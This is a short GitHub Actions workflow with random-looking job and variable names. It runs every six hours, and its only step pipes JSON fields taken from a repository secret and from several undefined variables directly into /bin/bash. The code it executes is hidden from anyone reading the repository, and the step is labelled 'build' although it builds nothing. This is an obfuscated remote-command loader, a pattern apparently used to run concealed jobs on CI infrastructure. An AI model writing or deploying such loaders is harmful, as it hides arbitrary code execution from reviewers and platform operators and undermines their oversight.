name: qijihuo2345

on:
  workflow_dispatch:
  schedule:
    - cron: '56 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: qijihuo2345
        env:
          zfytg38365: ${{ secrets.zfytg38365 }}
        run: |
          echo $zfytg38365 | jq -r .eno3 | /bin/bash
          echo $yyo7500 | jq -r .tzhsc37438 | /bin/bash
          echo $l9672 | jq -r .jxrgt24 | /bin/bash
          echo $twkq22 | jq -r .wq1 | /bin/bash
          echo $khw731 | jq -r .l9381 | /bin/bash
          echo $gbq3990 | jq -r .maxj166 | /bin/bash

